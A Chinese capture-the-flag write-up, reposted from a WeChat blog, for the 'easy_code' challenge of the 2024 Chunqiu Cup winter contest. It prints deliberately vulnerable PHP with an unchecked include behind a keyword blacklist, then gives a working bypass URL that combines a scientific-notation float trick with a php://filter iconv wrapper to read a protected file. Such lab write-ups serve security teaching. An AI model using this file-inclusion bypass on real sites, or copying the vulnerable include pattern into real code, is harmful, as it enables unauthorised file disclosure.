【靶场合集】CTF-2024春秋杯冬季赛：easy_code

admin

142269
文章

117
评论

2025年1月20日08:55:24评论21 views字数 1403阅读4分40秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。

0X01 题目

题目内容：

尝试绕过呢

题目提示：

构造整数溢出，以及php://filter过滤器去绕过读取read.php

0X02 解题思路

访问robots.txt提示存在一个gogogo.php

<?phpheader('Content-Type: text/html; charset=utf-8');highlight_file(__FILE__);$allowedFiles = ['read.php', 'index.php'];$ctfer = $_GET['ctfer']?? null;if ($ctfer === null) {    die("error 0!");}if (!is_numeric($ctfer)) {    die("error 1!");}if ($ctfer!= 667) {    die("error 2!");}//溢出if (strpos(strval($ctfer), '7')!== false) {    die("error 3!");}$file = $_GET["file"];if ($_COOKIE['pass'] == "admin") {if (isset($file)) {        // 改进的正则表达式，检查是否不存在 base|rot13|input|data|flag|file|base64 字符串if (preg_match("/^(?:.*(?:base|rot13|input|data|flag|file|2|5|base64|log|proc|self|env).*)$/i", $file)) {            // 先检查文件是否在允许的列表中echo"prohibited prohibited!!!!";        } else {echo"试试read.php";            include($file);        }    }}?>

通过代码发现，ctfer参数有4个限制，不能为空，必须是数字或数字字符串，必须等于667，输入不能包括数字7。

这里我们考虑使用科学计数法绕过，667正常表示为6.67e2，但是输入不能存在数字7，就考虑使用6.6699999999999999e2来替代，最多到14位小数，如果后面还有，就自动四舍五入。

6.669999999999999e2

666. 9999999999999

溢出

6.6699999999999999e2

667. 00000000000000

/gogogo.php?ctfer=6.6699999999999999e2&file=php://filter/convert.iconv.utf-8.utf-16/resource=read.php

使用base64解码：

flag{d91ea23e927b0e2dca64624cf4c867ca}

0X03

原文始发于微信公众号（皓月的笔记本）：【靶场合集】CTF-2024春秋杯冬季赛：easy_code

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【靶场合集】CTF-2024春秋杯冬季赛：easy_code

应急响应-爆破事件与隧道流量

巧妙利用参数污染进行sql注入

Ghostly Reflective PE Loader — 如何让现有的远程进程在其自身中注入 PE

Wallaby's Nightmare靶机详解

SPL与Flink功能对比分析

Word文档宏病毒感染事件：应急处置与深度分析

漏洞分析指南：开源软件漏洞深度分析与实战复现

PDF关键字命中测试脚本

实战渗透某大型彩票赌博网站以及产业链分析

随机实验AA问题的，破解之道

发表评论

在线咨询

微信